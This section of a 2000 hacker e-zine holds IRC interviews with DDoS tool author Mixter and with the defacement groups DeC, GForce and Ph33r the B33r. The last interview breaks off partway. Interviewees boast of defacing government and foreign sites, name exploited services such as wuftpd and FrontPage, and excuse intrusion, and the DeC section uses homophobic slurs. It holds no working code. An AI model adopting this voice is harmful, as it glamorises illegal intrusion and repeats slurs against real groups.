      <Cruciphux> tribe flood network
      <r00thl3ss> im 29
      <suave> i have hundreds of t3's on my tfn
      <Cruciphux> its distributed denial of service 
      <suave> i use tfn2k tho bro
      <suave> its got more features
      <blame_> ohyah
      <Cruciphux> what about tfn3000
      <blame_> we at DeC are all about tfn2k
      <Cruciphux> heh
      <r00thl3ss> cruciphux are u in2 fones dude?
      <Cruciphux> used to be
      <r00thl3ss> u ever hack a switch?
      <Cruciphux> but i'm supposed to be interviewing you
      <r00thl3ss> ha sounds like a no 2 me
      <blame_> oh ok
      <blame_> well
      <blame_> u know MoD?
      <Cruciphux> if you're gonna act like dorks and not answer questions
      <r00thl3ss> im in MoD/LoD
      <Cruciphux> then what the fuck am I doing here?
      <r00thl3ss> so's blame & suave
      <blame_> yah
      <Cruciphux> this is incredibly lame
      <r00thl3ss> actually only im in LoD but we're all in MoD
      <r00thl3ss> uh y
      <Cruciphux> you seem to know shit
      <Cruciphux> you've told me nothing
      <Cruciphux> dont answer questions
      <blame_> whut do u wanna know?
      <Cruciphux> and want me to print this?
      <r00thl3ss> ask me something technical about switches!
      <Cruciphux> you're ops in #phrack?
      <blame_> just be like
      <r00thl3ss> yah of course we're ops in #phrack
      <Cruciphux> you said before you didnt know what a switch or dms was
      <Cruciphux> lol
      <Cruciphux> you said thats like beige boxing right
      <r00thl3ss> i was kidding
      <r00thl3ss> 2nd chance!
      <suave> cruciphux sup
      <Cruciphux> well tell me something
      <Cruciphux> heh
      <blame_> "DeC - super-underground, fuck with them & get rmd"
      <blame_> E0F
      <Cruciphux> thats it?
      <Cruciphux> ok
      <Cruciphux> i'll publish that
      <Cruciphux> any props?
      <suave> ok so lets talk about shells
      <suave> ya props 2 me & my crew (Dec)
      <blame_> yaaah uhhh
      <Cruciphux> ok disses?
      <Cruciphux> ;)
      <blame_> yah
      <r00thl3ss> PHRACK
      <blame_> everybody
      <suave> disses 2 phrack
      <blame_> gH
      <r00thl3ss> everybody especially PHRACK
      <Cruciphux> you guys do drugs?
      <blame_> phrack
      <blame_> HWA
      <suave> keelber elves
      <blame_> sSH
      <blame_> all those lam0rz
      <blame_> yah sure 
      <r00thl3ss> im str8 edge
      <suave> props 2 Rootshell Hackers from blame btw
      <r00thl3ss> yah disses to HWA 
      <suave> ya im sXe too
      <blame_> actually
      <Cruciphux> anything else?
      <blame_> scratch that propz to the rSH
      <r00thl3ss>         #     #
      <r00thl3ss>   ####   #   #   ######
      <r00thl3ss>  #        # #    #
      <r00thl3ss>   ####     #     #####
      <r00thl3ss>       #   # #    #
      <blame_> oh yah
      <blame_> be like
      <blame_> "HWA iz gay"
      <blame_> "DeC is gr8"
      <Cruciphux> ...
      <Cruciphux> that all?
      <r00thl3ss>  #    #  #   #   #
      <r00thl3ss>   ####  #     #  ######
      <r00thl3ss>  #    #  #    #    ##
      <r00thl3ss>  #    #  #    #   #  #
      <r00thl3ss>  ######  #    #  #    #
      <blame_> yah sure
      <Cruciphux> ok tnx
      <suave> crucipheux
      <suave> also
      <suave> make sure u mention this 
      <r00thl3ss>  #    #  # ## #  ######
      <r00thl3ss>  #    #  ##  ##  #    #
      <r00thl3ss>  #    #  #    #  #    #
      <r00thl3ss>     #     ####
      <r00thl3ss>     #    #
      <Cruciphux> this was quite the interview
      <suave> aempire is a fag
      <r00thl3ss>     #     ####
      <r00thl3ss>     #         #
      <r00thl3ss>     #    #    #
      <r00thl3ss>     #     ####
      <suave> man do ui have any more q's 4 me about shells or beige oxingh
      <suave> im willing 2 answer nething
      <r00thl3ss>   ####     ##     #   #
      <r00thl3ss>  #    #   #  #     # #
      <r00thl3ss>  #       #    #     #
      <r00thl3ss>  #  ###  ######     #
      <r00thl3ss>  #    #  #    #     #
      <Cruciphux> did you guys come from AOL originally?
      <Cruciphux> you like scrolling
      <r00thl3ss>   ####   #    #     #
      <r00thl3ss> haaha cruciSUX
      <r00thl3ss> disses to cruciphux
      <r00thl3ss> yah quiz us
      <r00thl3ss> i did!
      <suave> lol aol is for lamers
      <Cruciphux> so is scrolling
      <r00thl3ss> oh shyT misfire
      <r00thl3ss> i didnt really! 
      <blame_> aol is all lamers dude
      <Cruciphux> lol
      <suave> i got kicked off aol for aolhell
      <r00thl3ss> GAY-OL HAhA
      <Cruciphux> k tnx for nothin
      <r00thl3ss> me 2 dude!
       Cruciphux [hwa@hwa-security.net] has left #intr []
      [suave(g@U????T.net)] yo whens the interview gonn a be released
      [msg(suave)] lol
      [msg(suave)] next issue
      [msg(suave)] should be a smash hit
      [suave(g@U????T.net)] awesome man it was agr8 interview i feel agood about it and it was kewl meeting u
      [msg(suave)] heh ok man
      [msg(suave)] it was funny
      [msg(suave)] cheers
      [suave(g@U????T.net)] whens it coming out btw
      [msg(suave)] not sure i'm kinda busy
      [suave(g@U?????T.net)] ok bro let us know k
      [msg(suave)] sure
      <Cruciphux> unbelievable man
      <Cruciphux> that was supposed to be an "interview"
      <Cruciphux> with guys from DeC
      <Cruciphux> they know shit
      <Cruciphux> couldnt answer simple questions
      <Cruciphux> scrolled ascii
      <Cruciphux> and just said shit like HWA IZ GAY AN WE IZ GR8
      <Cruciphux> rofl
      <Cruciphux> sigh
      <Cruciphux> sad
      <Cruciphux> totally
      <Cruciphux> two of em said two different names
      <Cruciphux> lol
      <Cruciphux> that was a hilarious interview
      <Cruciphux> gonna edit it now
      <Cruciphux> brb
      IRC log ended Tue Aug  1 17:06:24 2000
      
      ---END---
      
      Special thanks to jeemjones, who pointed out they were taking the piss; I never would have 
      guessed all by myself, tnx jj! I put up with this drivel on occasion and sometimes even
      listen... who knows, someone may say something intelligent one day.. </sarcasm>
      
      - Cruci
      
      @HWA            
      
325.0 [HWA] Interview: Mixter by Cruciphux (NOT SugarKing)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      (c) 2000 by HWA-Security
      please credit http://hwa-security.net
      as source if you use any part or all of this
      transcript. Thanks
      
      Mailto: media@hwa-security.net
      
      
      Cruciphux/HWA
      
      Note: Originally published in HWA.hax0r.news issue #53
      http://welcome.to/HWA.hax0r.news
      
      Mixter <mixter@newyorkoffice.com>
      http://mixter.warrior2k.com/
      
      Cruciphux <Cruciphux@dok.org>
      http://welcome.to/HWA.hax0r.news/
      
      
      Mixter is the author of the TFN (Tribe Flood Network) software, which was
      recently brought into the limelight by Mafiaboy, who used a variant called
      mstream to attack some big-name web sites and effectively shut them down 
      for several hours.
      
      ->
      -> Technical Overview:
      ->
      -> See Packetstorm http://packetstorm.securify.com
      ->   http://packetstorm.securify.com/papers/unix/tfn.analysis.txt
      ->
      -> Analysis of the "Tribe Flood Network", or "TFN", by Mixter.
      -> TFN is a powerful distributed attack tool and backdoor currently
      -> being developed and tested on a large number of compromised
      -> Unix systems on the Internet.
      ->
      
      
      Sunday afternoon May 21st 2000.
      
      [ For the most part un-edited so you can decide what is ]
      [ interesting and what isn't, general chatter has been  ]
      [ removed and hostnames blanked out.                    ]
      
      
      ***** ADDENDUM/CORRECTION ***************************************************
      
      [ NOTE: I was incorrectly under the assumption at the time of this interview
      that Mafiaboy used Mixter's code to do his DDoS damage; this turned out to
      be false. In fact mstream (discussed elsewhere with source code) was used and
      NOT TFN. My apologies for the inaccuracies. - Cruciphux ]
      
      ******************************************************************************
      
      
      Session Start: Sun May 21 13:13:43 2000
      Session Ident: Mixter (mixter@*.net)
      [13:19] <Cruciphux> what inspired you to write the TFN software?
      [13:20] <Cruciphux> what where your goals, thoughts, intended uses
      [13:20] <Cruciphux> :
      [13:20] <Mixter> hmm
      [13:20] <Mixter> well, I coded it for the same purpose I code everything,
      because I simply like coding, and now or then you'll create something
      important
      [13:21] <Mixter> if not, coding something is always a new excercise for
      yourself...
      [13:21] <Cruciphux> you could code something but still not release it
      publically, was it merely POC or did you expect it to be used?
      [13:22] <Mixter> I've heard about these tools on irc like two years ago, at
      least that people wanted to create them
      [13:22] <Mixter> POC=? :)
      [13:22] <Mixter> sorry I spend way too little time in usenet etc.
      [13:22] <Cruciphux> Proof Of Concept
      [13:22] <Cruciphux> np
      [13:22] <Mixter> o
      [13:23] <Mixter> no, the first version was just a nice powerful tool to
      write up
      [13:23] <Cruciphux> what is your view on the Mafiaboy debacle and how do you
      feel about your software being used to attack major web sites?
      [13:24] <Mixter> it was interesting to see this concept worked, and you
      could contact hosts at a fast speed and with tunneling through raw packets
      and all
      [13:24] <Mixter> tfn2k, was however a pure POC.. any kiddie who tried to use
      it will know how buggy it is :)
      [13:25] <Cruciphux> can you explain the concept to us and how it works?
      [13:25] <Mixter> I think, when the government and media forces need
      something to puff out, they'll always find something
      [13:25] <Mixter> if it wasnt for the dos attacks, it wouldve been something
      else
      [13:26] <Mixter> I believe all packet kiddies out there should get a life...
      but they do more damage to irc servers and users than anything else, though
      [13:26] <Cruciphux> true but it was you that made the tool available, they
      may not otherwise have decided to attack these sites
      [13:27] <Cruciphux> do you feel responsible at all?
      [13:28] <Mixter> the plain concept of distributed attacks is to start
      processes from a lot of hosts, simple as that. in distributed packet
      flooding, you launch all processes against a single target. theoretically,
      before all the tools came out, when people just logged on to a lot of shells
      and run their udp/syn flooders against 1 target, that was the same stuff.
      what the new programs do, raw tunneling, or encrypted tcp control
      connections are just feature improvements to the same
      [13:28] <Mixter> that they have a big impact on feasibility and speed of
      distributed attacks and other things like distributed scanning
      [13:28] <Mixter> hm ok :)
      [13:29] <Mixter> its important to realize that the "authorities" biggest
      instrument is false guilt
      [13:30] <Mixter> people can't withdraw from it, and if they do, they're
      still being persecuted.. so I believe that people like mafiaboy arent
      innocent since they knew what they were doing, but simply sitting in front
      of your home computer and typing in commands can hardly make you a
      "criminal"
      [13:31] <Cruciphux> would you extend that view to "hacking" also?
      [13:31] <Cruciphux> whats your view on people who deface websites?
      [13:32] <Mixter> if you talk about hacking as in breaking into servers, I
      have no ethical problems with it as long as it is for the cause of improving
      the security, e.g. patching and/or notifying the people
      [13:33] <Cruciphux> so you are ok with non destructive intrusion so long as
      you patch the hole you came in through?
      [13:33] <Mixter> website defacements in general are destructive, because
      they can harm companies by destroying their images.. so it isnt something
      people should do.. exceptions are of course sites that stand for violation
      of human and individual rights
      [13:33] <Cruciphux> what if the system is borrowed to say, host a bot on irc
      or launch further intrusion attempts?
      [13:34] <Cruciphux> yes I personally believe that socio-political defacements
      with a valid message are justifiable
      [13:34] <Mixter> well, I DONT recommend intrusion at all in these big
      brotherish times, it's far more easy to do productive, legal work, by
      working for a company or founding your own one, but lets say I have no
      problem with it, if no damage is created
      [13:35] <Cruciphux> what other software are you working on presently?
      [13:35] <Mixter> if they hack systems to host a bot, that's a pretty
      clueless and dangerous way... if they HAVE to intrude or if they dont have
      the small money, the only acceptable way is to contact the administration,
      notify them of the problem and ask for resources in exchange for securing
      their site
      [13:36] <Mixter> yeah.. it's pretty lame though, when you see some
      anti-human-rights site defaced, and you have in black on gray one line of
      text that says "pr0pz to muh brothers of the gibson h4xing cl4n"
      [13:36] <Mixter> ;/
      [13:37] <Cruciphux> considering the little cost involved in offering a
      hacker system resources in exchange for securing a server it seems strange
      it doesn't happen more often
      [13:37] <Mixter> well, security software, auditing software and more.. the
      problem is I can't disclose that without permission from my employees, and I
      wouldn't break my agreement
      [13:37] <Mixter> err employers
      [13:38] <Cruciphux> you currently are employed in the security field, were
      you ever a grey-hat?
      [13:38] <Cruciphux> i suppose thats a round about way of asking if you have
      hacked yourself in the past
      [13:38] <Mixter> yes it does.. but the whole thing is based on trust, and if
      it would become practice that hackers outline vulnerabilities and then get
      local access (from where they have LOTS of insider attacking possibilities),
      most people would have a problem trusting them
      [13:39] <Mixter> heh.. well yeah, I broke into hosts without permission in
      the past
      [13:39] <Cruciphux> trust is earned however and the notification of
      intrusion would be a demonstration of intent
      [13:39] <Mixter> at the beginning of my career, I started out with
      developing eggdrop/tcl (not for takeover, just for defense and fun for the
      most part)
      [13:39] <Cruciphux> how old are you?
      [13:40] <Mixter> that was 2 1/2 years ago.. I hadn't a clue about the legal
      issues back then, and wasn't even certain if what I was doing is illegal
      [13:42] <Mixter> ah, the notification of intrusion could also be used as a
      social engineering (<- stupid term :P) method, to get the trust, and then
      attack them from the inside with their consent :>
      [13:42] <Cruciphux> how did you get into computers? what was your initial
      exposure? first machine?
      [13:43] <Mixter> no, I don't care about that, after about 50 news agencies
      published name, address, birthdate, and photos of me back in february :P
      [13:43] <Cruciphux> k
      [13:45] <Cruciphux> how did you get into computers? what was your initial
      exposure? first machine?
      [13:46] <Mixter> my initial exposure was a c64 I used when I was about 6-8
      yrs old
      [13:46] <Mixter> i programmed a lot in basic, some machine language later :)
      [13:47] <Cruciphux> Are you self taught or do you have any official
      schooling in programming etc?
      [13:47] <Mixter> if people wouldnt all start with big PC OS's like windows,
      they'd probably figure out programming and the ins and outs of computing
      much better and faster...
      [13:47] <Cruciphux> yeah I started on a vic-20
      [13:47] <Cruciphux> wrote a bbs on it
      [13:47] <Cruciphux> it had 4k ram
      [13:47] <Mixter> oh well, the nice feds took away my computer back in 98
      [13:48] <Cruciphux> for what?
      [13:48] <Mixter> i hadnt had a pc for 3 months, that was when I read awful
      lots of programming, networking etc books and really got into the technical
      aspects
      [13:48] <Mixter> for installing some bots on a couple of hosts :]
      [13:48] <Cruciphux> *g*
      [13:49] <Cruciphux> thats about it really, thanks for yer time, any closing
      comments?
      [13:49] <Mixter> hey, nobody's perfect. I really *was* clueless about the
      tracing stealthing etc aspects of hacking, leave alone the legal stuff back
      then.. just exploring and doing anything I could :)
      [13:49] <Cruciphux> :-)
      [13:49] <Mixter> nope, if you dont have any closing questions ;)
      [13:49] <Cruciphux> when I sold my first c64 system, the guy that bought had
      nagged and nagged me
      [13:50] <Mixter> hehe
      [13:50] <Cruciphux> for some phreaking software i had, I finally gave in and
      let him have it warning him not to
      [13:50] <Cruciphux> actually use it unless he learned how it worked etc
      [13:50] <Cruciphux> he called me a week later
      [13:50] <Mixter> phreaking is something nice.. I really wish I could've done
      it in the time and/or country when it was feasible and not too dangerous
      [13:50] <Cruciphux> he was busted and had the $750 system confiscated
      [13:50] <Cruciphux> :)
      [13:51] <Mixter> aw :)
      [13:51] <Cruciphux> I was into it when I was younger
      [13:51] <Cruciphux> it was fun
      [13:51] <Mixter> i spent $3000 on my first PC
      [13:51] <Cruciphux> yeh same here
      [13:51] <Mixter> the one that got confiscated ;x
      [13:52] <Cruciphux> I paid $900 for a used 9M hard drive for my c64 bbs and
      $1000 for the USR 9600 external modem
      [13:52] <Cruciphux> heh
      [13:54] <Cruciphux> funny thinking about a 9 megabyte hard disk these days,
      it was the size of a ups
      [13:55] <Cruciphux> actually it might have been 7M
      [13:55] <Cruciphux> anyways we're all done i'll ttyl - thanks
      Session Close: Sun May 21 13:55:44 2000
            
      END
      
      @HWA            
      
 326.0 [HWA] Interview: back to business, political hackers GForce by SugarKing      
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
        You have seen the high profile sites on Attrition that have been
        defaced by GForce, SugarKing from HWA Staff interviews GForce
        members for a closer look into why they do it.
            
        (c) 2000 by SugarKing/HWA-Security
        please credit http://hwa-security.net
        as source if you use any part or all of this
        transcript. Thanks
        
        Mailto: media@hwa-security.net
      
        Cruciphux/HWA
      
      [ Session Start - slightly edited ]
             
      [20:59] <sniper-> SugarKing: So we can start the interview ;)
      [20:59] <sniper-> sure
      [20:59] <SugarKing> alright, is this everyone you want present?
      [21:00] <sniper-> yes, most of other guys aren't on, some are busy, and it's very early here.
      [21:00] <SugarKing> yeah
      [21:01] <SugarKing> ok, you don't have to answer any question if you don't want to...
      [21:01] <sniper-> ok
      [21:02] <SugarKing> so lets begin:)
      [21:02] <sniper-> yep
      [21:02] <SugarKing> ok first off, how many members are there, and who are they?
      [21:03] *** sniper- is now known as sniper__
      [21:03] <rave-> ehehe
      [21:03] <SugarKing> heh
      [21:03] <rave-> services sux
      [21:03] <sniper__> There are about 5 members, they are myself, miller, rave-, heataz, and instinct atm
      [21:03] <SugarKing> ok
      [21:04] <SugarKing> when was the group founded and by who?
      [21:04] <sniper__> It was founded about a year ago, and by myself, heataz and miller
      [21:05] <SugarKing> what was your sole purpose of starting the group? for the reasons you name in your defacements?
      [21:06] <sniper__> GForce was born out of hate and contempt for violence, atrocities and human rights violations against Muslims, specially the affectees in Kashmir
      [21:06] <sniper__> It was precipitated to bring the attention of world leaders and organizations to the issue in cyberspace which is today the leading source of communication. The motive behind the formation of the group was to create global awareness about kashmir.
      [21:06] <SugarKing> which members are actually from Pakistan?
      [21:07] <SugarKing> if any
      [21:07] <sniper__> we focus on kashmir, basically.
      [21:07] <SugarKing> so nobody is actually from kashmir?
      [21:07] <sniper__> well i`m from pakistan, others would like to stay anonymous please.
      [21:08] <sniper__> well no one is from kashmir.
      [21:08] <SugarKing> sure, np
      [21:08] <sniper__> =)
      [21:08] <SugarKing> some of your defacements are gov servers, any reason of targeting gov's, are you afraid to get busted?
      [21:09] <sniper__> Not really, We are not afraid to get busted for the reason that it's a good cause, secondly members are out of the feds reach ;)
      [21:10] <SugarKing> yeah of course
      [21:11] <SugarKing> you are one of, if not the only, people on attrition that I've seen that actually have a REASON
      [21:11] <SugarKing> instead of just "I 0wn j00"
      [21:11] <rave-> :)
      [21:11] *** snipah- (**************) has joined #gforce
      [21:11] <snipah-> sory i got disconnected.
      [21:11] <snipah-> US government was targeted because 1) more people view .gov's and we can do a good job in achieving the goal, we are out for. 2) We're a big angry :)
      [21:12] <snipah-> big=bit
      [21:12] *** sp1n sets mode: +o snipah-
      [21:12] <SugarKing> and it seems like you guys got some skill, seeing you don't really do any NT hacks
      [21:12] *** rpcb1nd (***************) has joined #gforce
      [21:12] *** sk0l (*****************) has joined #gforce
      [21:12] *** sp1n sets mode: +o rpcb1nd
      [21:12] *** sp1n sets mode: +o sk0l
      [21:13] <snipah-> i`m glad we don't do NT,
      [21:13] <snipah-> we are supported by a study group known as hexa labs
      [21:13] <SugarKing> what is hexa labs
      [21:13] <SugarKing> ?
      [21:13] <snipah-> Plus every member can code (usefully)
      [21:14] <snipah-> hexa labs is a study group, they find out vulnerabilities, code them (we help code)
      [21:14] <snipah-> most of it is being kept private.
      [21:14] *** sniper__ has quit IRC (Ping timeout)
      [21:14] <SugarKing> you guys ever use your own exploits when using them on defacing?
      [21:15] *** sk0l sets mode: +l 14
      [21:16] [rave-:#gforce PING]
      [21:16] <rave-> ehhe
      [21:16] <rave-> alot of times we use own exploitz
      [21:16] <SugarKing> heh
      [21:17] <rave-> sometimes we use a wuftp (b0f rulz) and bind.. but no details
      [21:17] <SugarKing> yeah b0f rules
      [21:17] <rave-> :)
      [21:17] <rave-> :)
      [21:17] <SugarKing> what do you guys think about ./hack kiddies on attrition like the Crime Boys?
      [21:18] *** snipah- has quit IRC (Ping timeout)
      [21:18] <rave-> oh
      [21:18] <rave-> we dont appreciate it, we think about just kids who dont know what to do.
      [21:19] <rave-> who thinks about computer hacking/security is just get proggies from others dudes and exploit of Dos something
      [21:19] <rave-> we think about computer security is a big culture and need to dedicate to it, studys, tests, and fucking blowing head
      [21:19] <rave-> eheh
      [21:20] <rave-> crimeboys is very poor
      [21:20] <rave-> NT hackers
      [21:20] <SugarKing> yeah I agree
      [21:20] <SugarKing> are most of you guys teenagers?
      [21:21] <rave-> i dunno about sniper but i have 20 yrs old
      [21:22] *** sniper__ (***************) has joined #gforce
      [21:22] <SugarKing> wb
      [21:22] *** rave- sets mode: +o sniper__
      [21:22] <sniper__> thx
      [21:22] <SugarKing> so why do you think India is solely responsible for this ordeal in Kashmir?
      [21:24] *** rpcb1nd sets mode: +l 13
      [21:24] <sniper__> because they are, 1) they are pretty lame as they don't wana listen to any one, the people want freedom but India won't let them to add to all this they rape innocent women, small children get murdered, made orphans. and they violate human rights
      [21:25] *** sp1n sets mode: +l 14
      [21:26] <SugarKing> nod
      [21:26] <SugarKing> pretty violent
      [21:27] <sniper__> yep.
      [21:27] <SugarKing> you guys plan on keep defacing and protesting till someone gets busted?
      [21:28] <sniper__> not sure, but yes we will be defacing for some while. ;)
      [21:28] <SugarKing> what do you plan on accomplishing by defacing on this issue?
      [21:29] <SugarKing> to get people to realize the situation ?
      [21:29] <sniper__> yep, create global awareness, on many occasions people have asked us if kashmir is some one like kevin mitnick =)
      [21:30] <sniper__> obviously they 'kashmir' is some guy
      [21:30] <SugarKing> hahah
      [21:31] <sniper__> they thought even.
      [21:31] <SugarKing> any last comments/shout outs?:)
      [21:32] <sniper__> =]
      [21:33] <sniper__> yes
      [21:34] <SugarKing> shoot:)\
      [21:35] <sniper__> I`d like to thank mos (muslim online syndicates) for what ever they have done, Pakistan Hackers club, hexa labs for coding, attrition, munge, punkis, null, mcintyres, jerisho for fast mirroring, zillion@safemode , rr, cen, and all in @linuxsex
      [21:35] <sniper__> oh and #darknet@efnet ;)
      [21:36] <sniper__> last shouts to hwa security ;)
      [21:37] <SugarKing> hah nice, thanks for the interview:)
      [21:37] <sniper__> ah, np
      [21:39] [rave-:#gforce PING]
      
      END
      
      @HWA      

327.0 [HWA] Interview: Ph33r the B33r by SugarKing
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      (c) 2000 by SugarKing/HWA-Security
      please credit http://hwa-security.net
      as source if you use any part or all of this
      transcript. Thanks
      
      Mailto: media@hwa-security.net
      
      
      Cruciphux/HWA
      
      Note: Originally published in HWA.hax0r.news issue #53
      http://welcome.to/HWA.hax0r.news
      
      Exclusive interview by HWA staff writer SugarKing
      Contact him at: sugaking@gis.net
      Or editor at: cruciphux@dok.org
      
      
      
       Session Start: Thu May 04 21:15:55 2000
       [21:15] *** Now talking in #vivalaresistance
       [21:16] <p4ntera> lets do this
       [21:16] <SugarKing> lock the channel
       [21:16] <p4ntera> no one knows of it
       [21:16] <p4ntera> i cant
       [21:16] <p4ntera> lol
       [21:16] <SugarKing> ok
       [21:16] <SugarKing> heh
       [21:16] <SugarKing> one sec bro
       [21:16] <p4ntera> werd
       [21:16] <SugarKing> talking to a chick on the phone:)
       [21:17] <p4ntera> heh
       [21:17] <p4ntera> hurry mon aint got much time
       [21:17] <SugarKing> alright
       [21:17] <SugarKing> logging now
       [21:17] <SugarKing> aight
       [21:17] <SugarKing> you guys don't have to answer anything
       [21:17] <SugarKing> just say no comment:)
       [21:17] <p4ntera> iight
       <SNIP>
       [21:17] <p4ntera> wtf
       [21:17] <SugarKing> heh
       [21:18] <Da_Pest> Whats up?
       [21:18] <Da_Pest> Yo we gonna start?
       [21:18] <SugarKing> so how long has ph33r the b33r been a group?
       [21:18] <SugarKing> we're already starting:)
       [21:18] <p4ntera> well
       [21:18] <Da_Pest> Ok : )
       [21:18] <p4ntera> i recruited people from the early october
       [21:18] <p4ntera> so lets say october
       [21:18] <SugarKing> ok...
       [21:18] <Da_Pest> I joined probably in december or november
       [21:18] <Da_Pest> Which one was it p4ntera?
       [21:18] <p4ntera> november
       [21:19] <Da_Pest> k
       [21:19] <SugarKing> so you started the group, p4ntera?
       [21:19] <p4ntera> yes
       [21:19] <SugarKing> any reason?
       [21:19] <p4ntera> well
       [21:19] <SugarKing> and what's with the name?
       [21:19] <p4ntera> because there wasn't much action going around in the underground
       [21:19] <Da_Pest> LoL
       [21:19] <Da_Pest> that name is joax
       [21:19] <p4ntera> so
       [21:19] <p4ntera> i wanted people to know the "scene" aint dead
       [21:19] <p4ntera> the name?
       [21:19] <p4ntera> lmao
       [21:19] <p4ntera> well its a LONNNG story
       [21:20] <Da_Pest> Very long
       [21:20] <SugarKing> heh
       [21:20] <p4ntera> yeah
       [21:20] <Da_Pest> he told me once
       [21:20] <Da_Pest> Dont wanna hear it again
       [21:20] <p4ntera> u still wanna hear it?
       [21:20] <SugarKing> nah that's ok
       [21:20] <SugarKing> save some time
       [21:20] <p4ntera> yeah
       [21:20] <SugarKing> so how many members to date?
       [21:20] <p4ntera> holy shit
       [21:20] <p4ntera> loll
       [21:20] <p4ntera> 14+
       [21:20] <Da_Pest> 15?
       [21:20] <p4ntera> most are just shadow members
       [21:20] <p4ntera> who remain in the background
       [21:20] <Da_Pest> Yah
       [21:21] <Da_Pest> Wait let me think
       [21:21] <Da_Pest> Yah 15 or 16 i can remember
       [21:21] <SugarKing> that's alot
       [21:21] <p4ntera> yeah
       [21:21] <SugarKing> u guys know how many sites you've defaced so far?
       [21:21] <p4ntera> next?
       [21:21] <p4ntera> another holy shit =)
       [21:21] <p4ntera> i would say 20+
       [21:21] <Da_Pest> LoL
       [21:21] <SugarKing> or don't keep count?
       [21:21] <SugarKing> 20+?
       [21:21] <p4ntera> yeah
       [21:21] <SugarKing> I would say 40
       [21:22] <Da_Pest> And many more to come
       [21:22] <SugarKing> just guessing
       [21:22] <SugarKing> heh
       [21:22] <p4ntera> well
       [21:22] <p4ntera> i dont wanna sound cocky
       [21:22] <p4ntera> =)
       [21:22] <SugarKing> why do you guys deface? fame?
       [21:22] <p4ntera> nah
       [21:22] <p4ntera> well i like to show people the underground aint dead
       [21:22] <p4ntera> and well
       [21:22] <p4ntera> some for fame too
       [21:22] <p4ntera> but not all
       [21:23] <SugarKing> what do you mean "the underground aint dead"?
       [21:23] <Da_Pest> Yah i agree
       [21:23] <p4ntera> hence why we havent defaced the higher up sites
       [21:23] <p4ntera> well
       [21:23] <p4ntera> look on attrition
       [21:23] <p4ntera> mostly frontpage kiddies, or brazilian kids who cant speak
       [21:23] <p4ntera> english
       [21:23] <p4ntera> or both
       [21:23] <SugarKing> hah ya
       [21:23] <Da_Pest> MSADC GALORE
       [21:23] <p4ntera> i say the 2 go together in the same sentence
       [21:23] <Da_Pest> HAHA
       [21:23] <p4ntera> da_pest, dont even give em that =)
       [21:23] <Da_Pest> lol
       [21:23] <Da_Pest> Tru dat
       [21:24] <SugarKing> hah
       [21:24] <p4ntera> next?
       [21:24] <SugarKing> you guys afraid of being busted?
       [21:24] <p4ntera> hell yeah
       [21:24] <Da_Pest> Of course
       [21:24] <p4ntera> i dont wanna have a friend named backdoor billy
       [21:24] <SugarKing> then why do you keep defacing?
       [21:24] <p4ntera> well
       [21:24] <Da_Pest> You think i want bull shit on my record lol
       [21:24] <p4ntera> we're in it now
       [21:24] <p4ntera> we can't stop
       [21:24] <p4ntera> plus i dont wanna
       [21:25] <SugarKing> ya you can
       [21:25] <SugarKing> I did
       [21:25] <SugarKing> don't wanna? why?
       [21:25] <p4ntera> i cover my tracks well, and i hide myself
       [21:25] <p4ntera> i like defacing
       [21:25] <Da_Pest> Plus we said we are afraid of gettin caught but i personally enjoy the rush of the chance of getting caught
       [21:25] <Da_Pest> same
       [21:25] <Da_Pest> :)
       [21:25] <p4ntera> hes right
       [21:25] <SugarKing> what about ethics? 
       [21:25] <p4ntera> well
       [21:25] <SugarKing> i did it for awhile
       [21:25] <p4ntera> i rarely do medical sites
       [21:26] <SugarKing> but i don't think it's right
       [21:26] <SugarKing> not needed
       [21:26] <p4ntera> no msadc
       [21:26] <SugarKing> eh
       [21:26] <SugarKing> heh
       [21:26] <p4ntera> and usually if i feel sorry for the admin
       [21:26] <p4ntera> i give him the patch
       [21:26] <SugarKing> if you feel sorry?
       [21:26] <Da_Pest> I think its safe to say NT will be out of PTB for a bit eh p4ntera?
       [21:26] <SugarKing> haha
       [21:26] <p4ntera> thats right
       [21:26] <p4ntera> but now we're going for countries
       [21:27] <Da_Pest> Oh yah
       [21:27] <SugarKing> countries?
       [21:27] <p4ntera> as you might have saw, we raped korea pretty bad
       [21:27] <p4ntera> =)
       [21:27] <SugarKing> ya i noticed a bit
       [21:27] <p4ntera> yeah
       [21:27] <Da_Pest> Yah'
       [21:27] <p4ntera> next is a country that everyone hates
       [21:27] <p4ntera> we plan to finish it up tomorrow (korean sites that is)
       [21:27] <Da_Pest> Yah
       [21:28] <SugarKing> what about others calling you guys script kiddies and indeed having script kiddies as members
       [21:28] <Da_Pest> We gonna clean up the .kr tomorrow eh p4ntera?
       [21:28] <p4ntera> well
       [21:28] <SugarKing> not to name any *cough*artech*cough*
       [21:28] <SugarKing> :)
       [21:28] <p4ntera> lets not get into artech
       [21:28] <Da_Pest> Ok artech
       [21:28] <Da_Pest> I d liek to say something about him
       [21:28] <p4ntera> i consider a script kiddie someone who uses scripts and not knows what it actually does
       [21:28] <Da_Pest> sorry like
       [21:28] <SugarKing> go ahead:)
       [21:28] <Da_Pest> Ok
       [21:28] <Da_Pest> He is basically a frontpage KIDDY
       [21:28] <p4ntera> yeah
       [21:29] <SugarKing> yeah I noticed
       [21:29] <SugarKing> aol kiddie
       [21:29] <p4ntera> he doesnt even know what NTLM authentication is
       [21:29] <p4ntera> or
       [21:29] <p4ntera> how he uses the everyone/guest group to hack with frontpage
       [21:29] <p4ntera> he just randomly tries sites
       [21:29] <Da_Pest> He dissed p4ntera and I meanwhile we have our own ideas of hax0ring while he does absolutely frontpage
       [21:29] <p4ntera> which is pretty fucking lame
       [21:29] <Da_Pest> Ok
       [21:29] <Da_Pest> Go on attrition
       [21:29] <Da_Pest> and look at his hacks
       [21:29] <Da_Pest> Im pretty sure every one of them is NT
       [21:29] <p4ntera> nah thats not important
       [21:29] <SugarKing> yeah they are
       [21:29] <p4ntera> lets move on to something else
       [21:29] <SugarKing> i don't think he knows what linux is
       [21:30] <p4ntera> NT can be raped other ways
       [21:30] <Da_Pest> Yah
       [21:30] <p4ntera> as u saw with what i did
       [21:30] <Da_Pest> But he uses only frontpage
       [21:30] <SugarKing> yeah 
       [21:30] <Da_Pest> Yep
       [21:30] <p4ntera> that is correct
       [21:30] <SugarKing> how many members code?
       [21:30] <p4ntera> netbios is a weak fucking protocol
       [21:30] <p4ntera> well
